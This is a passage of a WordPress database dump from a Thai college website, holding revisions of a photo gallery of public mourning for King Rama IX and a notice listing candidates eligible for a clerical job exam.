(4350, 3, '2018-11-12 11:46:34', '2018-11-12 04:46:34', '<h3 style=\"text-align: center;\"><span class=\"fontstyle0\" style=\"color: #993300;\">“พิธีจุดเทียนถวายความอาลัยและสวดมนต์ข้ามปี ของชาวเมืองบุรีรัมย์”</span></h3>\r\n<img class=\"aligncenter wp-image-4313 size-large\" src=\"/wp-content/uploads/2018/11/2-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระภิกษุชาวเมืองบุรีรัมย์และจังหวัดใกล้เคียงร่วมกันทําพิธีสวดมนต์ข้ามปี เนื่องในวันสิ้นปี และถวายความอาลัยแด่ในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ภาพจากพลังความตั้งใจ”</span></h3>\r\n<img class=\"aligncenter wp-image-4314 size-large\" src=\"/wp-content/uploads/2018/11/3-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เพื่อประชาชนด้วยพระหัตถ์ของพระองค์เอง”</span></h3>\r\n<img class=\"aligncenter wp-image-4315 size-large\" src=\"/wp-content/uploads/2018/11/4-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระเจ้าวรวงศ์เธอ พระองค์เจ้าโสมสวลี พระวรราชาทินัดดามาตุ ทรงประกอบอาหารด้วยพระองค์เอง เพื่อประทานแก่ประชาชนที่เข้ามากราบพระบรมศพในหลวงรัชกาลที่ 9 ณ บริเวณท้องสนามหลวง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“พิธีสวดมิสซา”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4316 size-large\" src=\"/wp-content/uploads/2018/11/12-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p class=\"alignnone\" style=\"text-align: center;\">การสวดมิสซาในโบสถ์อัสสัมชัญบางรัก กรุงเทพฯ เพื่อแสดงการไว้อาลัยต่อการจากไปของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“การปฏิบัติงานของเจ้าหน้าที่”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4317 size-large\" src=\"/wp-content/uploads/2018/11/17-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">เจ้าหน้าที่ตํารวจปฏิบัติหน้าที่บริเวณถนนหน้าพระลาน เพื่อจัดระเบียบและอํานวยความสะดวกแก่ประชาชนที่เข้ามาร่วมถวายสักการะพระบรมศพในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"> “แต่งดํา ทั้งเมือง”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4318 size-large\" src=\"/wp-content/uploads/2018/11/21-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">บรรยากาศการไว้อาลัยแด่ในหลวงรัชกาลที่ 9 ณ สถานีรถไฟฟ้ า BTS สยาม</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ชาวมอญ”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4319 size-large\" src=\"/wp-content/uploads/2018/11/23-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">ประชาชนที่มาถวายความอาลัยในหลวงรัชกาลที่ 9 ณ พระบรมหาราชวัง มักแต่งกายด้วยเสื้อผ้าสีดําเป็นหลัก แต่มีพสกนิกรอีกจํานวนไม่น้อย โดยเฉพาะกลุ่มชาติพันธุ์ต่าง ๆ ที่เลือกใส่เสื้อผ้าอาภรณ์อันเป็นเอกลักษณ์ ของกลุ่มตนเองมาถวายความอาลัยแทนเสื้อผ้าสีดํา เช่น ชาวไทยเชื้อสายมอญจากอําเภอสังขละบุรี จังหวัดกาญจนบุรีที่มากราบสักการะพระบรมศพในหลวงรัชกาลที่ 9 ในชุดแต่งกายประจําถิ่น</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เก็บไว้ในความทรงจํา”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4320 size-large\" src=\"/wp-content/uploads/2018/11/24-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">นอกจากจุดเทียนและวางดอกไม้เพื่อแสดงความอาลัย ณ บริเวณกําแพงด้านหน้าพระบรมมหาราชวังแล้ว ประชาชนจํานวนมากยังได้ซื้อหาพระบรมสาทิสลักษณ์ และพระบรมฉายาลักษณ์ที่พ่อค้าแม่ค้าจํานวนมากมาจําหน่ายเพื่อเก็บไว้เป็นความทรงจํา</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4321 size-large\" src=\"/wp-content/uploads/2018/11/27-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึก จุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐานพระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ครอบครัวพาสมาชิกตัวน้อยมาร่วมวางดอกไม้ ณ ริมกํา แพงพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4322 size-large\" src=\"/wp-content/uploads/2018/11/32-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">เพื่อแสดงความอาลัยต่อการเสด็จสวรรคตของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช และร่วมเป็นส่วนหนึ่งในช่วงเวลาที่สําคัญที่สุดของคนไทยทั้งประเทศ</p>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4323 size-large\" src=\"/wp-content/uploads/2018/11/37-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"> “ข้างกําแพงวัง”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4324 size-large\" src=\"/wp-content/uploads/2018/11/38-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ในวันที่พ่อจากไป...”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4325 size-large\" src=\"/wp-content/uploads/2018/11/42-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">ศูนย์การค้าแห่งหนึ่งจัดงานรําลึกและจุดเทียนถวายความอาลัยแด่ในหลวงรัชกาลที่ 9 ซึ่งในงานมีการแจกภาพในหลวงและลงนามถวายความอาลัย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“กราบรํา ลึกถึงพระองค์”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4326 size-large\" src=\"/wp-content/uploads/2018/11/43-Arun-Roysri-copy-1024x576.jpg\" alt=\"\" width=\"640\" height=\"360\" /></p>\r\n<p style=\"text-align: center;\">ราว 2 ทุ่ม ของวันพฤหัสบดีที่ 27 ตุลาคม พ.ศ. 2559 ชาวโพธาราม จังหวัดราชบุรีและอําเภอใกล้เคียง ได้มารวมตัวกันจุดเทียนสีขาว ร้องเพลงสรรเสริญพระบารมี และกราบพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 ณ บริเวณหาดทรายโพธารามริมแม่นํ้าแม่กลอง ด้วยความอาลัยและรําลึกถึงพระมหากรุณาธิคุณของพระองค์</p>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4327 size-large\" src=\"/wp-content/uploads/2018/11/54-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เฝ้ารอ...”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4328 size-large\" src=\"/wp-content/uploads/2018/11/55-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">ประชาชนตลอดสองฝั่งถนนรอรับขบวนเสด็จพระบรมวงศานุวงศ์ ที่เสด็จมาประกอบพิธีทางศาสนา เมื่อเสร็จพิธีเจ้าหน้าที่จะอนุญาตให้ประชาชน\r\nเข้าไปวางดอกไม้และจุดเทียนรอบกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><span style=\"color: #993300;\">“เสียงประสานจากใจ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4329 size-large\" src=\"/wp-content/uploads/2018/11/57-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p class=\"alignnone\" style=\"text-align: center;\">ประชาชนที่ร่วมกันร้องเพลงสรรเสริญพระบารมีและจุดเทียนถวายความอาลัย บริเวณท้องสนามหลวงและรอบกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4330 size-large\" src=\"/wp-content/uploads/2018/11/59-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4331 size-large\" src=\"/wp-content/uploads/2018/11/62-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4332 size-large\" src=\"/wp-content/uploads/2018/11/64-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4333 size-large\" src=\"/wp-content/uploads/2018/11/70-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4334 size-large\" src=\"/wp-content/uploads/2018/11/72-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4335 size-large\" src=\"/wp-content/uploads/2018/11/73-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4336 size-large\" src=\"/wp-content/uploads/2018/11/74-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" /> <img class=\"aligncenter wp-image-4337 size-large\" src=\"/wp-content/uploads/2018/11/76-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4338 size-large\" src=\"/wp-content/uploads/2018/11/77-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4339 size-large\" src=\"/wp-content/uploads/2018/11/81-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" /> <img class=\"aligncenter wp-image-4340 size-large\" src=\"/wp-content/uploads/2018/11/91-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></h3>', 'ภาพถ่าย โดย อรุณ ร้อยศรี', '', 'inherit', 'closed', 'closed', '', '4341-revision-v1', '', '', '2018-11-12 11:46:34', '2018-11-12 04:46:34', '', 4341, 'http://www.technicrayong.ac.th/4341-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(4351, 3, '2018-11-12 11:48:03', '2018-11-12 04:48:03', '<h3 style=\"text-align: center;\"><span class=\"fontstyle0\" style=\"color: #993300;\">“พิธีจุดเทียนถวายความอาลัยและสวดมนต์ข้ามปี ของชาวเมืองบุรีรัมย์”</span></h3>\r\n<img class=\"aligncenter wp-image-4313 size-large\" src=\"/wp-content/uploads/2018/11/2-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระภิกษุชาวเมืองบุรีรัมย์และจังหวัดใกล้เคียงร่วมกันทําพิธีสวดมนต์ข้ามปี เนื่องในวันสิ้นปี และถวายความอาลัยแด่ในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ภาพจากพลังความตั้งใจ”</span></h3>\r\n<img class=\"aligncenter wp-image-4314 size-large\" src=\"/wp-content/uploads/2018/11/3-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เพื่อประชาชนด้วยพระหัตถ์ของพระองค์เอง”</span></h3>\r\n<img class=\"aligncenter wp-image-4315 size-large\" src=\"/wp-content/uploads/2018/11/4-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระเจ้าวรวงศ์เธอ พระองค์เจ้าโสมสวลี พระวรราชาทินัดดามาตุ ทรงประกอบอาหารด้วยพระองค์เอง เพื่อประทานแก่ประชาชนที่เข้ามากราบพระบรมศพในหลวงรัชกาลที่ 9 ณ บริเวณท้องสนามหลวง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“พิธีสวดมิสซา”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4316 size-large\" src=\"/wp-content/uploads/2018/11/12-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p class=\"alignnone\" style=\"text-align: center;\">การสวดมิสซาในโบสถ์อัสสัมชัญบางรัก กรุงเทพฯ เพื่อแสดงการไว้อาลัยต่อการจากไปของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“การปฏิบัติงานของเจ้าหน้าที่”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4317 size-large\" src=\"/wp-content/uploads/2018/11/17-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">เจ้าหน้าที่ตํารวจปฏิบัติหน้าที่บริเวณถนนหน้าพระลาน เพื่อจัดระเบียบและอํานวยความสะดวกแก่ประชาชนที่เข้ามาร่วมถวายสักการะพระบรมศพในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"> “แต่งดํา ทั้งเมือง”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4318 size-large\" src=\"/wp-content/uploads/2018/11/21-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">บรรยากาศการไว้อาลัยแด่ในหลวงรัชกาลที่ 9 ณ สถานีรถไฟฟ้ า BTS สยาม</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ชาวมอญ”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4319 size-large\" src=\"/wp-content/uploads/2018/11/23-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">ประชาชนที่มาถวายความอาลัยในหลวงรัชกาลที่ 9 ณ พระบรมหาราชวัง มักแต่งกายด้วยเสื้อผ้าสีดําเป็นหลัก แต่มีพสกนิกรอีกจํานวนไม่น้อย โดยเฉพาะกลุ่มชาติพันธุ์ต่าง ๆ ที่เลือกใส่เสื้อผ้าอาภรณ์อันเป็นเอกลักษณ์ ของกลุ่มตนเองมาถวายความอาลัยแทนเสื้อผ้าสีดํา เช่น ชาวไทยเชื้อสายมอญจากอําเภอสังขละบุรี จังหวัดกาญจนบุรีที่มากราบสักการะพระบรมศพในหลวงรัชกาลที่ 9 ในชุดแต่งกายประจําถิ่น</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เก็บไว้ในความทรงจํา”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4320 size-large\" src=\"/wp-content/uploads/2018/11/24-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">นอกจากจุดเทียนและวางดอกไม้เพื่อแสดงความอาลัย ณ บริเวณกําแพงด้านหน้าพระบรมมหาราชวังแล้ว ประชาชนจํานวนมากยังได้ซื้อหาพระบรมสาทิสลักษณ์ และพระบรมฉายาลักษณ์ที่พ่อค้าแม่ค้าจํานวนมากมาจําหน่ายเพื่อเก็บไว้เป็นความทรงจํา</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4321 size-large\" src=\"/wp-content/uploads/2018/11/27-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึก จุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐานพระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ครอบครัวพาสมาชิกตัวน้อยมาร่วมวางดอกไม้ ณ ริมกํา แพงพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4322 size-large\" src=\"/wp-content/uploads/2018/11/32-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">เพื่อแสดงความอาลัยต่อการเสด็จสวรรคตของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช และร่วมเป็นส่วนหนึ่งในช่วงเวลาที่สําคัญที่สุดของคนไทยทั้งประเทศ</p>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4323 size-large\" src=\"/wp-content/uploads/2018/11/37-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"> “ข้างกําแพงวัง”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4324 size-large\" src=\"/wp-content/uploads/2018/11/38-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ในวันที่พ่อจากไป...”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4325 size-large\" src=\"/wp-content/uploads/2018/11/42-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">ศูนย์การค้าแห่งหนึ่งจัดงานรําลึกและจุดเทียนถวายความอาลัยแด่ในหลวงรัชกาลที่ 9 ซึ่งในงานมีการแจกภาพในหลวงและลงนามถวายความอาลัย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“กราบรํา ลึกถึงพระองค์”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4326 size-large\" src=\"/wp-content/uploads/2018/11/43-Arun-Roysri-copy-1024x576.jpg\" alt=\"\" width=\"640\" height=\"360\" /></p>\r\n<p style=\"text-align: center;\">ราว 2 ทุ่ม ของวันพฤหัสบดีที่ 27 ตุลาคม พ.ศ. 2559 ชาวโพธาราม จังหวัดราชบุรีและอําเภอใกล้เคียง ได้มารวมตัวกันจุดเทียนสีขาว ร้องเพลงสรรเสริญพระบารมี และกราบพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 ณ บริเวณหาดทรายโพธารามริมแม่นํ้าแม่กลอง ด้วยความอาลัยและรําลึกถึงพระมหากรุณาธิคุณของพระองค์</p>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4327 size-large\" src=\"/wp-content/uploads/2018/11/54-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เฝ้ารอ...”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4328 size-large\" src=\"/wp-content/uploads/2018/11/55-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">ประชาชนตลอดสองฝั่งถนนรอรับขบวนเสด็จพระบรมวงศานุวงศ์ ที่เสด็จมาประกอบพิธีทางศาสนา เมื่อเสร็จพิธีเจ้าหน้าที่จะอนุญาตให้ประชาชน\r\nเข้าไปวางดอกไม้และจุดเทียนรอบกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><span style=\"color: #993300;\">“เสียงประสานจากใจ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4329 size-large\" src=\"/wp-content/uploads/2018/11/57-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p class=\"alignnone\" style=\"text-align: center;\">ประชาชนที่ร่วมกันร้องเพลงสรรเสริญพระบารมีและจุดเทียนถวายความอาลัย บริเวณท้องสนามหลวงและรอบกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4330 size-large\" src=\"/wp-content/uploads/2018/11/59-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4331 size-large\" src=\"/wp-content/uploads/2018/11/62-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4332 size-large\" src=\"/wp-content/uploads/2018/11/64-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4333 size-large\" src=\"/wp-content/uploads/2018/11/70-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4334 size-large\" src=\"/wp-content/uploads/2018/11/72-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4335 size-large\" src=\"/wp-content/uploads/2018/11/73-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4336 size-large\" src=\"/wp-content/uploads/2018/11/74-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" /> <img class=\"aligncenter wp-image-4337 size-large\" src=\"/wp-content/uploads/2018/11/76-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4338 size-large\" src=\"/wp-content/uploads/2018/11/77-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /> <img class=\"aligncenter wp-image-4339 size-large\" src=\"/wp-content/uploads/2018/11/81-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" /> <img class=\"aligncenter wp-image-4340 size-large\" src=\"/wp-content/uploads/2018/11/91-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></h3>', 'ภาพถ่าย โดย อรุณ ร้อยศรี', '', 'inherit', 'closed', 'closed', '', '4341-revision-v1', '', '', '2018-11-12 11:48:03', '2018-11-12 04:48:03', '', 4341, 'http://www.technicrayong.ac.th/4341-revision-v1/', 0, 'revision', '', 0),
(4352, 3, '2018-11-12 12:40:59', '2018-11-12 05:40:59', 'https://youtu.be/xrNi-56jrzQ\r\n<h4><span style=\"color: #993300;\"><strong>เชิญชมภาพถ่าย คลิก Link ด้านล่าง</strong></span></h4>\r\nภาพถ่าย โดย อรุณ ร้อยศรี\r\n\r\nภาพถ่าย โดย บัณฑิต โชติสุวรรณ\r\n\r\nภาพถ่าย โดย จันทร์กลาง กันทอง\r\n\r\nภาพถ่าย โดย เริงชัย คงเมือง\r\n\r\nภาพถ่าย โดย เริงฤทธิ์ คงเมือง', '๑๐๐ วัน ร้อยเรื่อง เปลี่ยนความโทมนัสเป็นพลัง', '', 'inherit', 'closed', 'closed', '', '3805-revision-v1', '', '', '2018-11-12 12:40:59', '2018-11-12 05:40:59', '', 3805, 'http://www.technicrayong.ac.th/3805-revision-v1/', 0, 'revision', '', 0),
(4353, 3, '2018-11-12 12:48:07', '2018-11-12 05:48:07', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F11%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%8A%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%9C%E0%B8%B9%E0%B9%89%E0%B8%A1%E0%B8%B5%E0%B8%AA%E0%B8%B4%E0%B8%97%E0%B8%98%E0%B8%B4%E0%B9%8C%E0%B8%AA%E0%B8%AD%E0%B8%9A-%E0%B8%98%E0%B8%B8%E0%B8%A3%E0%B8%81%E0%B8%B2%E0%B8%A3.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รายชื่อผู้มีสิทธิสอบคัดเลือกเป็นลูกจ้างชั่วคราว ทำหน้าที่ธุรการ จำนวน ๓ อัตรา', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%8a%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%a1%e0%b8%b5%e0%b8%aa%e0%b8%b4%e0%b8%97-5', '', '', '2018-11-12 12:48:07', '2018-11-12 05:48:07', '', 0, 'http://www.technicrayong.ac.th/?p=4353', 249, 'post', '', 0),
(4354, 3, '2018-11-12 12:47:41', '2018-11-12 05:47:41', '', 'ประกาศ รายชื่อผู้มีสิทธิ์สอบ ธุรการ', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%8a%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%a1%e0%b8%b5%e0%b8%aa%e0%b8%b4%e0%b8%97-5', '', '', '2018-11-12 12:47:41', '2018-11-12 05:47:41', '', 4353, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/ประกาศ-รายชื่อผู้มีสิทธิ์สอบ-ธุรการ.pdf', 0, 'attachment', 'application/pdf', 0),
